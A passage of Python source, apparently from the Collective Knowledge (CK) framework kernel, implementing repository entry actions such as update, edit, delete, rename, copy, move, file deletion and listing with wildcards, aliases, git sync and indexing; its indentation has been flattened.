(updates) - entry updates info to record - normally, should not use it!
(ignore_update) - if 'yes', do not add info about update
(ask) - if 'yes', ask questions, otherwise silent
(unlock_uid) - unlock UID if was previously locked
(sort_keys) - if 'yes', sort keys
(skip_indexing) - if 'yes', skip indexing even if it is globally on
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
Output from the 'add' function (the last one in case of wildcards)
}
"""
# Check if global writing is allowed
r=check_writing({})
if r['return']>0: return r
# Try to load entry, if doesn't exist, add entry
dd={}
o=i.get('out','')
i['out']=''
# Check wildcards
lst=[]
a=i.get('repo_uoa','')
m=i.get('module_uoa','')
duoa=i.get('data_uoa','')
if duoa=='': duoa='*'
single_not_found=False # If no wild cards and entry not found, then add
if a.find('*')>=0 or a.find('?')>=0 or m.find('*')>=0 or m.find('?')>=0 or duoa.find('*')>=0 or duoa.find('?')>=0:
r=list_data({'repo_uoa':a, 'module_uoa':m, 'data_uoa':duoa})
if r['return']>0: return r
lst=r['lst']
else:
# Find path to data
r=find_path_to_data(i)
if r['return']>0:
single_not_found=True
else:
p=r['path']
ruoa=r.get('repo_uoa','')
ruid=r.get('repo_uid','')
muoa=r.get('module_uoa','')
muid=r.get('module_uid','')
duid=r.get('data_uid','')
duoa=r.get('data_alias','')
if duoa=='': duoa=duid
lst.append({'path':p, 'repo_uoa':ruoa, 'repo_uid':ruid,
'module_uoa':muoa, 'module_uid':muid,
'data_uoa':duoa, 'data_uid': duid})
# Update entries
i['out']=o
r={'return':0}
if single_not_found:
r=add(i)
else:
i['update']='yes'
for q in lst:
ii={}
ii.update(i)
ii.update(q)
r=add(ii)
if r['return']>0: return r
return r
##############################################################################
# Common action: edit data meta-description through external editor
#
# TARGET: CK kernel and low-level developers
def edit(i): # pragma: no cover
"""
Input: {
(repo_uoa) - repo UOA
module_uoa - module UOA
data_uoa - data UOA
(ignore_update) - (default==yes) if 'yes', do not add info about update
(sort_keys) - (default==yes) if 'yes', sort keys
(edit_desc) - if 'yes', edit description rather than meta
(useful for compiler descriptions)
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
}
"""
o=i.get('out','')
ruoa=i.get('repo_uoa','')
muoa=i.get('module_uoa','')
duoa=i.get('data_uoa','')
iu=i.get('ignore_update','')
if iu=='': iu='yes'
ed=i.get('edit_desc','')
sk=i.get('sort_keys','')
if sk=='': sk='yes'
ii={'action':'load',
'repo_uoa':ruoa,
'module_uoa':muoa,
'data_uoa':duoa,
'common_func':'yes'}
r=access(ii)
if r['return']>0: return r
desc=r.get('desc',{})
meta=r['dict']
# Record to tmp file
import tempfile
fd, fn=tempfile.mkstemp(suffix='.tmp', prefix='ck-') # suffix is important - CK will delete such file!
os.close(fd)
os.remove(fn)
if ed=='yes': dd=desc
else: dd=meta
r=save_json_to_file({'json_file':fn, 'dict':dd, 'sort_keys':sk})
if r['return']>0: return r
# Get OS
r=get_os_ck({})
if r['return']>0: return r
plat=r['platform']
x=cfg['external_editor'][plat].replace('$#filename#$', fn)
os.system(x)
# Load file
r=load_json_file({'json_file':fn})
if r['return']>0: return r
if ed=='yes': desc=r['dict']
else: meta=r['dict']
# Update entry to finish sync/indexing
ii={'action':'update',
'repo_uoa':ruoa,
'module_uoa':muoa,
'data_uoa':duoa,
'common_func':'yes',
'ignore_update':iu,
'dict':meta,
'desc':desc,
'substitute':'yes',
'sort_keys':sk,
'out':o}
r=access(ii)
# Delete tmp file
if os.path.isfile(fn):
os.remove(fn)
return r
##############################################################################
# Common action: delete data (module) entry
#
# TARGET: CK kernel and low-level developers
def rm(i):
"""
Input: {
(repo_uoa) - repo UOA ; can be wild cards
module_uoa - module UOA ; can be wild cards
data_uoa - data UOA ; can be wild cards
(force) - if 'yes', force deleting without questions
or
(f) - to be compatible with rm -f
(share) - if 'yes', try to remove via GIT
(tags) - use these tags in format tags=x,y,z to prune rm
or
(search_string) - prune entries with expression *?
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
}
"""
a=i.get('repo_uoa','')
# Check if global writing is allowed
r=check_writing({'repo_uoa':a, 'delete':'yes'})
if r['return']>0: return r
o=i.get('out','')
m=i.get('module_uoa','')
duoa=i.get('data_uoa','')
if duoa=='':
return {'return':1, 'error':'data UOA is not defined'}
lst=[]
tags=i.get('tags','')
ss=i.get('search_string','')
# Check wildcards
if a.find('*')>=0 or a.find('?')>=0 or m.find('*')>=0 or m.find('?')>=0 or duoa.find('*')>=0 or duoa.find('?')>=0:
if tags=='' and ss=='':
r=list_data({'repo_uoa':a, 'module_uoa':m, 'data_uoa':duoa})
if r['return']>0: return r
else:
r=search({'repo_uoa':a, 'module_uoa':m, 'data_uoa':duoa, 'tags':tags, 'search_string':ss})
if r['return']>0: return r
lst=r['lst']
else:
# Find path to data
r=find_path_to_data({'repo_uoa':a, 'module_uoa':m, 'data_uoa':duoa})
if r['return']>0: return r
p=r['path']
ruoa=r.get('repo_uoa','')
ruid=r.get('repo_uid','')
muoa=r.get('module_uoa','')
muid=r.get('module_uid','')
duid=r.get('data_uid','')
duoa=r.get('data_alias','')
if duoa=='': duoa=duid
uu={'path':p, 'repo_uoa':ruoa, 'repo_uid':ruid,
'module_uoa':muoa, 'module_uid':muid,
'data_uoa':duoa, 'data_uid': duid}
lst.append(uu)
force=i.get('force','')
if force=='':
force=i.get('f','')
first=True
for ll in lst:
p=ll['path']
pm=os.path.split(p)[0]
muid=ll['module_uid']
muoa=ll['module_uoa']
duid=ll['data_uid']
duoa=ll['data_uoa']
if duoa!=duid: dalias=duoa
else: dalias=''
# Get user-friendly CID
x=muoa+':'+duoa
if o=='con':
# Try to check if has data name (useful for env)
p2=os.path.join(p, cfg['subdir_ck_ext'], cfg['file_info'])
if os.path.isfile(p2):
r2=load_json_file({'json_file':p2})
if r2['return']==0:
x2=r2['dict'].get('data_name','')
if x2!='' and x2!=None:
x='"'+x2+'"\n '+x
xcuoa=x+' ('+muid+':'+duid+')'
# Check repo/module writing
ii={'module_uoa':m, 'repo_uoa':ll['repo_uoa'], 'repo_uid':ll['repo_uid']}
r=check_writing(ii)
if r['return']>0: return r
rd=r.get('repo_dict',{})
rshared=rd.get('shared','')
rsync=rd.get('sync','')
# Check if there is a split of directories for this module in local config
# to handle numerous entries (similar to MediaWiki)
split_dirs=get_split_dir_number(rd, muid, muoa)
if split_dirs!=0:
pm=os.path.split(pm)[0]
shr=i.get('share','')
if shr=='yes':
rshared='git'
rsync='yes'
# If interactive
to_delete=True
if o=='con' and force!='yes':
r=inp({'text':'Are you sure to delete CK entry '+xcuoa+' ? (y/N): '})
c=r['string'].lower()
if c!='y' and c!='yes': to_delete=False
# If deleting
if to_delete:
# First remove alias if exists
if dalias!='':
# Delete alias
r=delete_alias({'path':pm, 'data_alias':dalias, 'data_uid':duid, 'repo_dict':rd, 'share':shr})
if r['return']>0: return r
if rshared!='':
pp=os.path.split(p)
pp0=pp[0]
pp1=pp[1]
ppp=os.getcwd()
os.chdir(pp0)
ss=cfg['repo_types'][rshared]['rm'].replace('$#files#$', pp1)
rx=os.system(ss)
# Delete directory
r={'return':0}
if os.path.isdir(p):
r=delete_directory({'path':p})
if rshared!='':
os.chdir(ppp)
if r['return']>0: return r
# Check if need to delete index
if cfg.get('use_indexing','')=='yes' and index_module(muid,ll['repo_uid']):
path='/'+muid+'/'+duid+'/1'
ri=access_index_server({'request':'DELETE', 'path':path})
if ri['return']>0: return ri
if o=='con':
out(' Entry '+xcuoa+' was successfully deleted!')
return {'return':0}
##############################################################################
# Common action: delete data (module) entry -> calls rm function
#
# TARGET: CK kernel and low-level developers
def remove(i):
"""
Input: { See rm function }
Output: { See rm function }
"""
return rm(i)
##############################################################################
# Common action: delete data (module) entry -> calls rm function
#
# TARGET: CK kernel and low-level developers
def delete(i):
"""
Input: { See rm function }
Output: { See rm function }
"""
return rm(i)
##############################################################################
# Common action: rename data entry
#
# TARGET: CK kernel and low-level developers
def ren(i):
"""
Input: {
(repo_uoa) - repo UOA
module_uoa - module UOA
data_uoa - old data UOA
new_data_uoa - new data alias
or
new_data_uid - new data UID (leave empty to keep old one)
or
xcids[0] - {'data_uoa'} - new data UOA
(new_uid) - generate new UID
(remove_alias) - if 'yes', remove alias
(add_uid_to_alias) - if 'yes', add UID to alias
(share) - if 'yes', try to remove old entry via GIT and add new one
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
}
"""
# Check if global writing is allowed
r=check_writing({'delete':'yes'})
if r['return']>0: return r
o=i.get('out','')
ruoa=i.get('repo_uoa','')
muoa=i.get('module_uoa','')
duoa=i.get('data_uoa','')
if muoa=='': return {'return':1, 'error':'module UOA is not defined'}
if duoa=='': return {'return':1, 'error':'data UOA is not defined'}
# Attempt to load original entry meta
ii={'module_uoa':muoa, 'data_uoa':duoa}
if ruoa!='': ii['repo_uoa']=ruoa
r=load(ii)
if r['return']>0: return r
rdd=r
muid=r['module_uid']
pr=r['path_repo']
ddi=r['info']
duoa=r['data_uoa']
duid=r['data_uid']
dalias=r['data_alias']
change_data_name=(ddi.get('data_name','')==dalias)
p=r['path']
pm=r['path_module']
p1=os.path.join(pm, cfg['subdir_ck_ext'])
pn=p
# Check if writing is allowed
ruid=r['repo_uid']
ii={'module_uoa':muoa, 'module_uid':muid, 'repo_uoa':ruoa, 'repo_uid':ruid}
r=check_writing(ii)
if r['return']>0: return r
rd=r.get('repo_dict',{})
rshared=rd.get('shared','')
rsync=rd.get('sync','')
shr=i.get('share','')
if shr=='yes':
rshared='git'
rsync='yes'
# Check if index -> delete old index
if cfg.get('use_indexing','')=='yes' and index_module(muid,ruid):
path='/'+muid+'/'+duid+'/1'
ri=access_index_server({'request':'DELETE', 'path':path})
if ri['return']>0: return ri
# Check new data UOA
nduoa=i.get('new_data_uoa','')
nduid=i.get('new_data_uid','')
if nduid=='' and i.get('new_uid','')=='yes':
rx=gen_uid({})
if rx['return']>0: return rx
nduid=rx['data_uid']
xcids=i.get('xcids',[])
if len(xcids)>0:
xcid=xcids[0]
nduoa=xcid.get('data_uoa','')
if i.get('remove_alias','')=='yes':
nduoa=duid
if nduoa=='': nduoa=duoa
if cfg.get('allowed_entry_names','')!='':
import re
anames=cfg.get('allowed_entry_names','')
if not re.match(anames, nduoa) or \
not re.match(anames, nduid):
return {'return':1, 'error':'found disallowed characters in names (allowed: "'+anames+'")'}
if cfg.get('force_lower','')=='yes':
nduoa=nduoa.lower()
nduid=nduid.lower()
if nduid!=duid:
# Check that new UID doesn't exist
p2=os.path.join(p1, cfg['file_alias_u'] + nduid)
if os.path.isfile(p2):
return {'return':1, 'error':'new UID already exists'}
# Check if adding UID to alias
if i.get('add_uid_to_alias','')=='yes':
x=nduid
if x=='': x=duid
nduoa+='-'+x
if nduoa!=duoa:
if not is_uoa(nduoa):
return {'return':1, 'error':'alias has disallowed characters'}
# Need to rename directory
if os.path.isdir(nduoa):
return {'return':1, 'error': 'new alias already exists'}
# Check if there is a split of directories for this module in local config
# to handle numerous entries (similar to MediaWiki)
split_dirs=get_split_dir_number(rd, muid, muoa)
if split_dirs!=0:
sd1,sd2=split_name(nduoa, split_dirs)
pm1=pm
if sd2!='': # otherwise name is smaller than the split number
pm1=os.path.join(pm, sd1)
if not os.path.isdir(pm1):
os.mkdir(pm1)
pn=os.path.join(pm1, nduoa)
else:
pn=os.path.join(pm, nduoa)
if rshared!='' and rsync=='yes':
import shutil
shutil.copytree(p,pn)
ppp=os.getcwd()
pp=os.path.split(pn)
pp0=pp[0]
pp1=pp[1]
os.chdir(pp0)
ss=cfg['repo_types'][rshared]['add'].replace('$#files#$', pp1)
rx=os.system(ss)
pp=os.path.split(p)
pp0=pp[0]
pp1=pp[1]
ss=cfg['repo_types'][rshared]['rm'].replace('$#files#$', pp1)
rx=os.system(ss)
os.chdir(ppp)
if os.path.isdir(p):
shutil.rmtree(p, onerror=rm_read_only)
else:
os.rename(p, pn)
if nduid!='' or change_data_name:
# Change backup_data_uid in info file
ppi=os.path.join(pn,cfg['subdir_ck_ext'],cfg['file_info'])
if nduid!='':
ddi['backup_data_uid']=nduid
if change_data_name:
ddi['data_name']=nduoa
rx=save_json_to_file({'json_file':ppi, 'dict':ddi, 'sort_keys':'yes'})
if rx['return']>0: return rx
if nduid=='': nduid=duid
# Remove old alias disambiguator
if not is_uid(duoa):
r=delete_alias({'path':pm, 'data_uid':duid, 'data_alias':duoa, 'share':shr})
if r['return']>0: return r
# Add new disambiguator, if needed
if not is_uid(nduoa):
if not os.path.isdir(p1):
# Create .cm directory
try:
os.mkdir(p1)
except Exception as e:
return {'return':1, 'error':format(e)}
# Write UOA disambiguator
p3=os.path.join(p1, cfg['file_alias_a'] + nduoa)
ru=save_text_file({'text_file':p3, 'string':nduid+'\n'})
if ru['return']>0: return ru
# Write UID disambiguator
p2=os.path.join(p1, cfg['file_alias_u'] + nduid)
ru=save_text_file({'text_file':p2, 'string':nduoa+'\n'})
if ru['return']>0: return ru
if rshared!='' and rsync=='yes':
ppp=os.getcwd()
pp=os.path.split(p1)
pp0=pp[0]
pp1=pp[1]
os.chdir(pp0)
ss=cfg['repo_types'][rshared]['add'].replace('$#files#$', pp1)
rx=os.system(ss)
os.chdir(ppp)
# Check if index and add new
if cfg.get('use_indexing','')=='yes' and index_module(muid,ruid):
# Need to reload to get new dictionary with updated aliases/UIDs
rdd=load({'repo_uoa':ruid,
'module_uoa':muid,
'data_uoa':nduid})
if rdd['return']>0: return rdd
if is_uid(nduoa): nduid=nduoa
path='/'+muid+'/'+nduid+'/1'
ri=access_index_server({'request':'DELETE', 'path':path})
if ri['return']>0: return ri
ri=access_index_server({'request':'PUT', 'path':path, 'dict':rdd})
if ri['return']>0: return ri
if o=='con':
out('Entry was successfully renamed!')
return {'return':0}
##############################################################################
# Common action: rename data entry -> calls 'ren' function
#
# TARGET: CK kernel and low-level developers
def rename(i):
"""
Input: { See ren function }
Output: { See ren function }
"""
return ren(i)
##############################################################################
# Common action: copy (or move) data entry
#
# TARGET: CK kernel and low-level developers
def cp(i):
"""
Input: {
(repo_uoa) - repo UOA
module_uoa - module UOA
data_uoa - data UOA
xcids[0] - {'repo_uoa', 'module_uoa', 'data_uoa'} - new CID
or
(new_repo_uoa) - new repo UOA
(new_module_uoa) - new module UOA
new_data_uoa - new data alias
(new_data_uid) - new data UID (leave empty to generate new one)
(move) - if 'yes', remove old
(keep_old_uid) - if 'yes', keep old UID
(without_files) - if 'yes', do not move/copy files
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
Output of 'add' function
}
"""
move=i.get('move','')
# Check if global writing is allowed
r=check_writing({})
if r['return']>0: return r
import shutil
o=i.get('out','')
ruoa=i.get('repo_uoa','')
muoa=i.get('module_uoa','')
duoa=i.get('data_uoa','')
if muoa=='': return {'return':1, 'error':'module UOA is not defined'}
if duoa=='': return {'return':1, 'error':'data UOA is not defined'}
# Attempt to load
ii={'module_uoa':muoa, 'data_uoa':duoa}
if ruoa!='': ii['repo_uoa']=ruoa
r=load(ii)
if r['return']>0: return r
rdd=r
muid=r['module_uid']
duoa=r['data_uoa']
duid=r['data_uid']
p=r['path']
dd=r.get('dict',{})
di=r.get('info',{})
du=r.get('updates',{})
dx=r.get('desc',{})
if move!='yes':
control=di.get('control',{})
control['version']=cfg['version']
rdt=get_current_date_time({})
control['iso_datetime']=rdt['iso_datetime']
di['control']=control
# Check if writing is allowed
ruid=r['repo_uid']
ii={'module_uoa':muoa, 'module_uid':r['module_uid'], 'repo_uoa':ruoa, 'repo_uid':ruid}
r=check_writing(ii)
if r['return']>0: return r
# Check new CID
nruoa=i.get('new_repo_uoa','')
nmuoa=i.get('new_module_uoa','')
nduoa=i.get('new_data_uoa','')
nduid=i.get('new_data_uid','')
xcids=i.get('xcids',[])
if len(xcids)>0:
xcid=xcids[0]
nduoa=xcid.get('data_uoa','')
if nduoa=='': nduoa=duoa
x=xcid.get('module_uoa','')
if x!='': nmuoa=x
x=xcid.get('repo_uoa','')
if x!='': nruoa=x
if i.get('keep_old_uid','')=='yes': nduid=duid
if nmuoa=='': nmuoa=muoa
if nruoa=='': nruoa=ruoa
if cfg.get('allowed_entry_names','')!='':
import re
anames=cfg.get('allowed_entry_names','')
if not re.match(anames, nduoa) or \
not re.match(anames, nduid):
return {'return':1, 'error':'found disallowed characters in names (allowed: "'+anames+'")'}
if cfg.get('force_lower','')=='yes':
nduoa=nduoa.lower()
nduid=nduid.lower()
nmuoa=nmuoa.lower()
nruoa=nruoa.lower()
# Adding new entry
if nruoa==ruoa and nmuoa==muoa and nduid==duid:
return {'return':1, 'error':'moving within the same directory - use "rename" instead'}
# Check if writing is allowed to the new repo
ii={'repo_uoa':nruoa}
r=check_writing(ii)
if r['return']>0: return r
rd=r.get('repo_dict',{})
rshared=rd.get('shared','')
rsync=rd.get('sync','')
ii={'module_uoa':nmuoa, 'data_uoa': nduoa, 'dict':dd, 'info':di,
'updates':du, 'desc':dx, 'ignore_update':'yes'}
if nduid!='': ii['data_uid']=nduid
if nruoa!='': ii['repo_uoa']=nruoa
r=add(ii)
if r['return']>0: return r
pn=r['path']
nmuid=r['module_uid']
# Recursively copying all files (except .cm)
if i.get('without_files','')!='yes':
rx=list_all_files({'path':p, 'all':'yes'})
if rx['return']>0: return rx
for q in rx['list']:
if q.startswith('.cm'): continue
p1=os.path.join(p,q)
pn1=os.path.join(pn,q)
# Create if dir
pn1d=os.path.dirname(pn1)
if not os.path.isdir(pn1d): os.makedirs(pn1d)
shutil.copy(p1,pn1)
if rshared!='' and rsync=='yes':
ppp=os.getcwd()
pp=os.path.split(pn)
pp0=pp[0]
pp1=pp[1]
os.chdir(pp0)
ss=cfg['repo_types'][rshared]['add'].replace('$#files#$', pp1)
rx=os.system(ss)
os.chdir(ppp)
tt='copied'
# If move, remove old one
if move=='yes':
tt='moved'
ii={'module_uoa':muoa, 'data_uoa': duoa}
if ruoa!='': ii['repo_uoa']=ruoa
rx=rm(ii)
if rx['return']>0: return rx
# Check if index and add new
if cfg.get('use_indexing','')=='yes' and index_module(muid,ruid):
if is_uid(nduoa): nduid=nduoa
path='/'+nmuid+'/'+nduid+'/1'
ri=access_index_server({'request':'DELETE', 'path':path})
if ri['return']>0: return ri
if cfg.get('use_indexing','')=='yes' and index_module(muid,nruoa):
ri=access_index_server({'request':'PUT', 'path':path, 'dict':rdd})
if ri['return']>0: return ri
if o=='con':
out('Entry '+muoa+':'+duoa+' was successfully '+tt+'!')
return r
##############################################################################
# Common action: copy (or move) data entry
#
# TARGET: CK kernel and low-level developers
def copy(i):
"""
Input: { See 'cp' function }
Output: { See 'cp' function }
"""
return cp(i)
##############################################################################
# Common action: move data entry
#
# TARGET: CK kernel and low-level developers
def mv(i):
"""
Input: {
(repo_uoa) - repo UOA
module_uoa - module UOA
data_uoa - data UOA
xcids[0] - {'repo_uoa', 'module_uoa', 'data_uoa'} - new CID
or
(new_repo_uoa) - new repo UOA
(new_module_uoa) - new module UOA
(new_data_uoa) - new data alias
(new_data_uid) - new data UID (leave empty to generate new one)
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
Output of 'copy' function
}
"""
# Check if global writing is allowed
r=check_writing({'delete':'yes'})
if r['return']>0: return r
# Check if wild cards
ruoa=i.get('repo_uoa','')
muoa=i.get('module_uoa','')
duoa=i.get('data_uoa','')
nduoa=i.get('new_data_uoa','')
nduid=i.get('new_data_uid','')
xcids=i.get('xcids',[])
if len(xcids)>0:
xcid=xcids[0]
nduoa=xcid.get('data_uoa','')
if (duoa.find('*')>=0 or duoa.find('?')>=0) and nduoa=='' and nduid=='':
r=list_data({'repo_uoa':ruoa, 'module_uoa':muoa, 'data_uoa':duoa})
if r['return']>0: return r
lst=r['lst']
else:
lst=[{'repo_uoa':ruoa, 'module_uoa':muoa, 'data_uoa':duoa}]
i['move']='yes'
i['keep_old_uid']='yes'
r={'return':0}
for ll in lst:
i['repo_uoa']=ll['repo_uoa']
i['module_uoa']=ll['module_uoa']
i['data_uoa']=ll['data_uoa']
r=copy(i)
if r['return']>0: return r
return r
##############################################################################
# Common action: move data entry
#
# TARGET: CK kernel and low-level developers
def move(i):
"""
Input: { See 'mv' function }
Output: { See 'mv' function }
"""
return mv(i)
##############################################################################
# Common action: delete file from an entry
#
# TARGET: CK kernel and low-level developers
def delete_file(i):
"""
Input: {
(repo_uoa) - repo UOA
module_uoa - module UOA
data_uoa - data UOA
filename - filename to delete including relative path
(force) - if 'yes', force deleting without questions
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
}
"""
# Check if global writing is allowed
r=check_writing({'delete':'yes'})
if r['return']>0: return r
o=i.get('out','')
ruoa=i.get('repo_uoa','')
muoa=i.get('module_uoa','')
duoa=i.get('data_uoa','')
# Check file
fn=i.get('filename','')
if fn=='':
x=i.get('cids',[])
if len(x)>0:
fn=x[0]
if fn=='':
return {'return':1, 'error':'filename is empty'}
if duoa=='':
return {'return':1, 'error':'data UOA is not defined'}
if fn=='':
return {'return':1, 'error':'filename is not defined'}
# Get info about entry
r=load({'repo_uoa':ruoa, 'module_uoa':muoa, 'data_uoa':duoa})
if r['return']>0: return r
p=r['path']
ruoa=r['repo_uoa']
ruid=r['repo_uid']
# Check repo/module writing
ii={'module_uoa':muoa, 'repo_uoa':ruoa, 'repo_uid':ruid}
r=check_writing(ii)
if r['return']>0: return r
rd=r.get('repo_dict',{})
rshared=rd.get('shared','')
rsync=rd.get('sync','')
p1=os.path.normpath(os.path.join(p, fn))
px=os.path.normpath(os.path.join(p, cfg['subdir_ck_ext']))
if p1.startswith(px):
return {'return':1, 'error':'path points to the special directory with meta info'}
if not p1.startswith(p):
return {'return':1, 'error':'path is outside entry'}
if not os.path.isfile(p1) and not os.path.isdir(p1):
return {'return':1, 'error':'file or directory is not found'}
p2=os.path.split(p1)
px0=p2[0]
px1=p2[1]
if rshared!='':
ppp=os.getcwd()
os.chdir(px0)
ss=cfg['repo_types'][rshared]['rm'].replace('$#files#$', px1)
rx=os.system(ss)
if os.path.isfile(p1):
os.remove(p1)
if os.path.isdir(p1):
import shutil
shutil.rmtree(p1, onerror=rm_read_only)
if rshared!='':
os.chdir(ppp)
return {'return':0}
##############################################################################
# Common action: list data entries
#
# TARGET: CK kernel and low-level developers
def list_data(i):
"""
Input: {
(repo_uoa) - repo UOA
(module_uoa) - module UOA
(data_uoa) - data UOA
(repo_uoa_list) - list of repos to search
(module_uoa_list) - list of module to search
(data_uoa_list) - list of data to search
(filter_func) - name of filter function
(filter_func_addr) - address of filter function
(add_if_date_before) - add only entries with date before this date
(add_if_date_after) - add only entries with date after this date
(add_if_date) - add only entries with this date
(ignore_update) - if 'yes', do not add info about update (when updating in filter)
(search_by_name) - search by name
(search_dict) - search if this dict is a part of the entry
(ignore_case) - ignore case when searching!
(print_time) - if 'yes', print elapsed time at the end
(do_not_add_to_lst) - if 'yes', do not add entries to lst
(time_out) - in secs, default=30 (if -1, no timeout)
(limit_size) - if !='' limit size
(print_full) - if 'yes', show CID (repo_uoa:module_uoa:data_uoa)
or
(all)
(print_uid) - if 'yes', print UID in brackets
(print_name) - if 'yes', print name (and add info to the list)
or
(name)
(add_info) - if 'yes', add info about entry to the list
(add_meta) - if 'yes', add meta about entry to the list
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
lst - [{'repo_uoa', 'repo_uid',
'module_uoa', 'module_uid',
'data_uoa','data_uid',
'path' (,info)
}]
elapsed_time - elapsed time in string
(timed_out) - if 'yes', timed out or limited by size
}
"""
import time
start_time = time.time()
xls=i.get('limit_size','')
if xls=='': xls='0'
ls=int(xls)
ils=0
lst=[]
o=i.get('out','')
debug=(cfg.get('debug','').lower()=='yes' or cfg.get('debug','').lower()=='1')
iu=i.get('ignore_update', '')
prf=i.get('print_full','')
if prf=='': prf=i.get('all','')
iprf=(prf=='yes')
prn=i.get('print_name','')
if prn=='': prn=i.get('name','')
iprn=(prn=='yes')
ipru=(i.get('print_uid','')=='yes')
# Add info about entry to the final list
# (particularly when searching by special keywords,
# such as name or date of creation
iaf=(i.get('add_info','')=='yes')
iam=(i.get('add_meta','')=='yes')
aidb=i.get('add_if_date_before','')
aida=i.get('add_if_date_after','')
aid=i.get('add_if_date','')
# Support ISO and human readable time
aidb=aidb.strip().replace(' ','T')
aida=aida.strip().replace(' ','T')
aid=aid.strip().replace(' ','T')
oaidb=None
oaida=None
oaid=None
sn=i.get('search_by_name','')
if aidb!='' or aida!='' or aid!='':
import datetime
if aidb!='':
rx=convert_iso_time({'iso_datetime':aidb})
if rx['return']>0: return rx
oaidb=rx['datetime_obj']
if aida!='':
rx=convert_iso_time({'iso_datetime':aida})
if rx['return']>0: return rx
oaida=rx['datetime_obj']
if aid!='':
rx=convert_iso_time({'iso_datetime':aid})
if rx['return']>0: return rx
oaid=rx['datetime_obj']
if oaidb!=None or oaida!=None or oaid!=None or sn!='':
iaf=True
dnatl=i.get('do_not_add_to_lst','')
idnatl=False
if dnatl=='yes': idnatl=True
ruoa=i.get('repo_uoa','')
muoa=i.get('module_uoa','')
muid=i.get('module_uid','')
duoa=i.get('data_uoa','')
lruoa=i.get('repo_uoa_list',[])
lmuoa=i.get('module_uoa_list',[])
lduoa=i.get('data_uoa_list',[])
# Check if need to force lower case for all entries
if cfg.get('force_lower','')=='yes':
ruoa=ruoa.lower()
muoa=muoa.lower()
muid=muid.lower()
duoa=duoa.lower()
lruoa=lower_list(lruoa)
lmuoa=lower_list(lmuoa)
lduoa=lower_list(lduoa)
to=float(i.get('time_out','30'))
elapsed_time=0
if duoa=='': duoa='*'
if muoa=='' and muid=='': muoa='*'
if ruoa=='': ruoa='*'
sff=i.get('filter_func','')
ff=i.get('filter_func_addr',None)
if sff!='':
ff=getattr(sys.modules[__name__], sff)
if ff!=None:
sd=i.get('search_dict',{})
ic=i.get('ignore_case','')
ss=i.get('search_string','')
if ic=='yes': ss=ss.lower()
# Check if wild cards present (only repo or data)
wr=''
wm=''
wd=''
if ruoa.find('*')>=0 or ruoa.find('?')>=0: wr=ruoa
if muoa.find('*')>=0 or muoa.find('?')>=0: wm=muoa
if duoa.find('*')>=0 or duoa.find('?')>=0: wd=duoa
if wr!='' or wm!='' or wd!='':
import fnmatch
zr={}
fixed_repo=False
if ruoa!='' and wr=='':
# Try to load a given repository
r=access({'action':'load',
'module_uoa':cfg['repo_name'],
'data_uoa':ruoa,
'common_func':'yes'})
if r['return']>0: return r
duid=r['data_uid']
zr[duid]=r
fixed_repo=True
else:
# Prepare all repositories
r=reload_repo_cache({}) # Ignore errors
if r['return']>0: return r
zr=cache_repo_info
# Start iterating over repositories
ir=0
iir=True
zrk=list(zr.keys())
lr=len(zrk)
finish=False
while iir:
skip=False
repo_dict={}
if fixed_repo:
if ir>0:
skip=True
iir=False
else:
ruid=zrk[0]
d=zr[ruid]
dd=d.get('dict',{})
repo_dict=dd
remote=dd.get('remote','')
if remote=='yes':
skip=True
else:
ruoa=d.get('data_uoa','')
p=dd.get('path','')
if ruid==cfg['repo_uid_default']: p=work.get('dir_default_repo','')
elif ruid==cfg['repo_uid_local']: p=work.get('dir_local_repo','')
elif ir==0:
ruoa=cfg['repo_name_default']
ruid=cfg['repo_uid_default']
p=work.get('dir_default_repo','')
elif ir==1:
ruoa=cfg['repo_name_local']
ruid=cfg['repo_uid_local']
p=work.get('dir_local_repo','')
if p=='':
skip=True
else:
if ir<lr+2:
ruid=zrk[ir-2]
d=zr[ruid]
dd=d.get('dict',{})
repo_dict=dd
remote=dd.get('remote','')
if remote=='yes':
skip=True
else:
ruoa=d.get('data_uoa','')
p=dd.get('path','')
else:
skip=True
iir=False
# Check if wild cards
if not skip and p!='' and wr!='':
if len(lruoa)>0 and (ruoa not in lruoa and ruid not in lruoa):
skip=True
elif wr=='*':
pass
elif is_uid(ruoa):
skip=True # If have wildcards, but not alias
elif not fnmatch.fnmatch(ruoa, wr):
skip=True
# Check if got proper path
if not skip and p!='':
# Prepare modules in the current directory
xm=[]
if muoa!='' and wm=='':
xm.append(muoa)
else:
# Now iterate over modules inside a given path
try:
lm=os.listdir(p)
except Exception as e:
None
else:
for fn in lm:
if os.path.isdir(os.path.join(p,fn)) and fn not in cfg['special_directories']:
xm.append(fn)
# Iterate over modules
for mu in xm:
r=find_path_to_entry({'path':p, 'data_uoa':mu})
if r['return']==0:
mp=r['path']
muid=r['data_uid']
muoa=r['data_uoa']
# Check if there is a split of directories for this module in local config
# to handle numerous entries (similar to MediaWiki)
split_dirs=get_split_dir_number(repo_dict, muid, muoa)
mskip=False
if wm!='':
if len(lmuoa)>0 and (muoa not in lmuoa and muid not in lmuoa):
mskip=True
elif wm=='*':
pass
elif is_uid(muoa):
mskip=True # If have wildcards, but not alias
elif not fnmatch.fnmatch(muoa, wm):
mskip=True
if not mskip:
# Prepare data in the current directory
xd=[]
if duoa!='' and wd=='':
iii={'path':mp, 'data_uoa':duoa}
if split_dirs!=0:
iii['split_dirs']=split_dirs
r=find_path_to_entry(iii)
if r['return']==0:
xd.append(duoa)
else:
# Now iterate over data inside a given path
try:
ld=os.listdir(mp)
except Exception as e:
None
else:
for fn in ld:
if os.path.isdir(os.path.join(mp,fn)) and fn not in cfg['special_directories']:
if split_dirs!=0:
mp2=os.path.join(mp,fn)
try:
ld2=os.listdir(mp2)
except Exception as e:
None
for fn in ld2:
if os.path.isdir(os.path.join(mp2,fn)) and fn not in cfg['special_directories']:
xd.append(fn)
else:
xd.append(fn)
# Iterate over data
if len(lduoa)>0:
xd=lduoa
for du in xd:
iii={'path':mp, 'data_uoa':du}
if split_dirs!=0:
iii['split_dirs']=split_dirs
r=find_path_to_entry(iii)
if r['return']!=0: continue
dp=r['path']
